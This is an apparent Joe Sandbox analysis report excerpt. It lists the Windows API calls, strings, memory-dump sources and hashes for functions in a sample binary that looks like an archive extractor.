                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CCC3B8
                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CCC3D4
                                                                  • _swprintf.LIBCMT ref: 00CCC404
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CCC417
                                                                  • FindClose.KERNEL32(00000000), ref: 00CCC41E
                                                                  • _swprintf.LIBCMT ref: 00CCC477
                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CCC48A
                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CCC4A7
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CCC4C7
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CCC4D7
                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CCC4F1
                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CCC509
                                                                  • _swprintf.LIBCMT ref: 00CCC535
                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CCC548
                                                                  • _swprintf.LIBCMT ref: 00CCC59C
                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CCC5AF
                                                                    • Part of subcall function 00CCAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CCAF35
                                                                    • Part of subcall function 00CCAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CEE72C,?,?), ref: 00CCAF84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                  • API String ID: 797121971-1840816070
                                                                  • Opcode ID: 5cf937e23f35c2f8891757febc502efcee816227730a4c10586acc6eb2bd9e75
                                                                  • Instruction ID: 68183404ab438be3c6355a4f5100c58f0672d898d0d03a71ea17eca2e44993d7
                                                                  • Opcode Fuzzy Hash: 5cf937e23f35c2f8891757febc502efcee816227730a4c10586acc6eb2bd9e75
                                                                  • Instruction Fuzzy Hash: 84918372148388BBE2219BA0DC89FFF77ACEB4A704F04481DF649D6181DB75A6059B72
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB6FAA
                                                                  • _wcslen.LIBCMT ref: 00CB7013
                                                                  • _wcslen.LIBCMT ref: 00CB7084
                                                                    • Part of subcall function 00CB7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CB7AAB
                                                                    • Part of subcall function 00CB7A9C: GetLastError.KERNEL32 ref: 00CB7AF1
                                                                    • Part of subcall function 00CB7A9C: CloseHandle.KERNEL32(?), ref: 00CB7B00
                                                                    • Part of subcall function 00CBA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641,000000FF), ref: 00CBA1F1
                                                                    • Part of subcall function 00CBA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641), ref: 00CBA21F
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CB7139
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00CB7155
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CB7298
                                                                    • Part of subcall function 00CB9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CB73BC,?,?,?,00000000), ref: 00CB9DBC
                                                                    • Part of subcall function 00CB9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CB9E70
                                                                    • Part of subcall function 00CB9620: CloseHandle.KERNELBASE(000000FF,?,?,00CB95D6,?,?,?,?,?,00CE2641,000000FF), ref: 00CB963B
                                                                    • Part of subcall function 00CBA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA501
                                                                    • Part of subcall function 00CBA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                  • API String ID: 3983180755-3508440684
                                                                  • Opcode ID: 31f93a9329980f0a47cffed1625e43e9d31f33ad04ded621744ed0502d63c337
                                                                  • Instruction ID: f7f09c7a6aa43b1d301823b276dcea3cddaa47295bed87c4763a1cd15adef9a6
                                                                  • Opcode Fuzzy Hash: 31f93a9329980f0a47cffed1625e43e9d31f33ad04ded621744ed0502d63c337
                                                                  • Instruction Fuzzy Hash: D2C1D571904644AADB25EB74CC85FFEB7A8AF44300F00465AFE5AE7282D734BB44DB61
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
                                                                  • Opcode ID: 2bbd5f50694205add21bb7477fcdecb8cd7c46b4cd67ac2ce808a09d8249a2bc
                                                                  • Instruction ID: e5a53b826c6fbcf9605e00579683e2ca3e5c9fc5d617841b6cfd5808087fc648
                                                                  • Opcode Fuzzy Hash: 2bbd5f50694205add21bb7477fcdecb8cd7c46b4cd67ac2ce808a09d8249a2bc
                                                                  • Instruction Fuzzy Hash: 20C22771E086288FDB25DE28DD407EAB7B5EB84305F1541EBD95EEB240E774AE818F40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog_swprintf
                                                                  • String ID: CMT$h%u$hc%u
                                                                  • API String ID: 146138363-3282847064
                                                                  • Opcode ID: a4cc80e3e02fd6644bd387a459385c22fe03ae0600cd91687f652fd09f287b86
                                                                  • Instruction ID: 04bd23879bab0ee370af0198a1303dbade35daf012f67b440e2eafef665f2a92
                                                                  • Opcode Fuzzy Hash: a4cc80e3e02fd6644bd387a459385c22fe03ae0600cd91687f652fd09f287b86
                                                                  • Instruction Fuzzy Hash: 5332E6715143C4AFDF14DF74C896AEA3BA5AF15300F08047DFD9A8B286DB74AA49DB20
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00CB2874
                                                                  • _strlen.LIBCMT ref: 00CB2E3F
                                                                    • Part of subcall function 00CC02BA: __EH_prolog.LIBCMT ref: 00CC02BF
                                                                    • Part of subcall function 00CC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CBBAE9,00000000,?,?,?,00010410), ref: 00CC1BA0
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB2F91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                  • String ID: CMT
                                                                  • API String ID: 1206968400-2756464174
                                                                  • Opcode ID: 507c54398c2003563e3f3574330b25e8c6f9bed057d34138ffa8a420412dd7e8
                                                                  • Instruction ID: f1a6c768ab8a289437a7b19c2ba2b12aa1a8659207987984fdceef0dc07d255a
                                                                  • Opcode Fuzzy Hash: 507c54398c2003563e3f3574330b25e8c6f9bed057d34138ffa8a420412dd7e8
                                                                  • Instruction Fuzzy Hash: 1A6218715002848FDF19DF78C885BEA3BA1EF54300F08457EECAA8B283DB759A45DB60
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CCF844
                                                                  • IsDebuggerPresent.KERNEL32 ref: 00CCF910
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CCF930
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00CCF93A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                  • String ID:
                                                                  • API String ID: 254469556-0
                                                                  • Opcode ID: 09ec5a92fb568b17a5774a406ac4c724fcb63a865bc79512890d5d5a4e90c431
                                                                  • Instruction ID: 4789988b4c347ddc9ac1e074ee7d8cbc175198607d8a4a0a50e1af4704e45fde
                                                                  • Opcode Fuzzy Hash: 09ec5a92fb568b17a5774a406ac4c724fcb63a865bc79512890d5d5a4e90c431
                                                                  • Instruction Fuzzy Hash: 0D311475D052599BDF21DFA4D989BCCBBF8AF08304F1041AEE40DAB290EB719B859F44
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(80000000,00CCE5E8,0000001C,00CCE7DD,00000000,?,?,?,?,?,?,?,00CCE5E8,00000004,00D11CEC,00CCE86D), ref: 00CCE6B4
                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CCE5E8,00000004,00D11CEC,00CCE86D), ref: 00CCE6CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: InfoQuerySystemVirtual
                                                                  • String ID: D
                                                                  • API String ID: 401686933-2746444292
                                                                  • Opcode ID: d435096a16f5a8556b61a4f9e683fde606d58cd19a091d9f8d769b6d53f1c430
                                                                  • Instruction ID: 6cecdd06b527d153848bbc09b11ded317502b1eecb33a464b708510286ea1788
                                                                  • Opcode Fuzzy Hash: d435096a16f5a8556b61a4f9e683fde606d58cd19a091d9f8d769b6d53f1c430
                                                                  • Instruction Fuzzy Hash: 0801DB72A00149ABDF14DE29DC49FED7BAAEFC5324F0CC128ED69DB154D634EA068790
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CD8FB5
                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CD8FBF
                                                                  • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00CD8FCC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: 68bf085cc23acf33f68f062f89c1e077e4f8bddcc4783e042a55e53031fdaed5
                                                                  • Instruction ID: 88ade8a8162dfe49bfa684a2522f8613e8691d5f182b86f44c8fe9b0adf62680
                                                                  • Opcode Fuzzy Hash: 68bf085cc23acf33f68f062f89c1e077e4f8bddcc4783e042a55e53031fdaed5
                                                                  • Instruction Fuzzy Hash: 5331A275901229ABCB21DF64DC89B9DBBB8AF48310F5041EEE41CA7250EB709F859F54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .
                                                                  • API String ID: 0-248832578
                                                                  • Opcode ID: 8d153712cad94ca5ee98eebd05ab11eea2f48940f592b6f13efa06434717895b
                                                                  • Instruction ID: 6180400cd47e0e130678700a7ed220e794a9e9dc2134c5983b066111047ed318
                                                                  • Opcode Fuzzy Hash: 8d153712cad94ca5ee98eebd05ab11eea2f48940f592b6f13efa06434717895b
                                                                  • Instruction Fuzzy Hash: AB312671800249AFCB24DE78CC84EFB7BBDDB85304F0541AEEA2887352EB309E419B50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                  • Instruction ID: 980ca96c7679c943de4c07a88632a69605a85e081956e5fa3a1121a96cf6e663
                                                                  • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                  • Instruction Fuzzy Hash: 45020D71E002199FDF14CFA9D9806ADB7F1EF48314F2581AAE91AE7384D731AE41CB90
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CCAF35
                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CEE72C,?,?), ref: 00CCAF84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FormatInfoLocaleNumber
                                                                  • String ID:
                                                                  • API String ID: 2169056816-0
                                                                  • Opcode ID: 1bcd768c9ccb62624f0bdf35cc475bdd50c366fb94a0815402d7b94b04efe5e6
                                                                  • Instruction ID: 596583e5c1d72ea34aacd5dd7d6d3c7c9e0d69c8c503f791b87b968fedbc7f51
                                                                  • Opcode Fuzzy Hash: 1bcd768c9ccb62624f0bdf35cc475bdd50c366fb94a0815402d7b94b04efe5e6
                                                                  • Instruction Fuzzy Hash: 7C01217A100348AAD710DF65DC89F9F77BCEF09750F105426FA09DB290D370A965CBA5
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00CB6DDF,00000000,00000400), ref: 00CB6C74
                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CB6C95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: ab5b7a2891ff0be96f149bfd2ba81026443bb326a025b1dc109b7d45eef6a0e4
                                                                  • Instruction ID: e6ad401f4cecc8c67902dd9cdc904b07343fe360633fc30482cad0a680511a66
                                                                  • Opcode Fuzzy Hash: ab5b7a2891ff0be96f149bfd2ba81026443bb326a025b1dc109b7d45eef6a0e4
                                                                  • Instruction Fuzzy Hash: A7D0C731344340BFFA110F618D4AF6E7F59FF45B91F14C4147755D90E0C6789514AA15
                                                                  APIs
                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CE19EF,?,?,00000008,?,?,00CE168F,00000000), ref: 00CE1C21
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionRaise
                                                                  • String ID:
                                                                  • API String ID: 3997070919-0
                                                                  • Opcode ID: bcdda834ac2f0b295a2de82adb38f87ff7d6a2be4ae03525250ccc1415b894c8
                                                                  • Instruction ID: b32905a240701a69d4fdc3a7ee5258a2e41b44f1c34a03b6d9b525843429fe4f
                                                                  • Opcode Fuzzy Hash: bcdda834ac2f0b295a2de82adb38f87ff7d6a2be4ae03525250ccc1415b894c8
                                                                  • Instruction Fuzzy Hash: 42B15E71610648DFD715CF29C48AB657BE0FF45364F298658ECAACF2A1C335EAA1CB40
                                                                  APIs
                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CCF66A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FeaturePresentProcessor
                                                                  • String ID:
                                                                  • API String ID: 2325560087-0
                                                                  • Opcode ID: 1f5e63e72393bcd162af2acf024d444ad1be72cf67689a423565f33b3d4d600a
                                                                  • Instruction ID: b7472323d2fdb5548a72eada0c55b469caa78eff3161398f0b69fc41577d293b
                                                                  • Opcode Fuzzy Hash: 1f5e63e72393bcd162af2acf024d444ad1be72cf67689a423565f33b3d4d600a
                                                                  • Instruction Fuzzy Hash: DA5180B19006199FDB28CF54E881BAEB7F5FB48354F24853ED415EB391D7749A02CB60
                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?), ref: 00CBB16B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
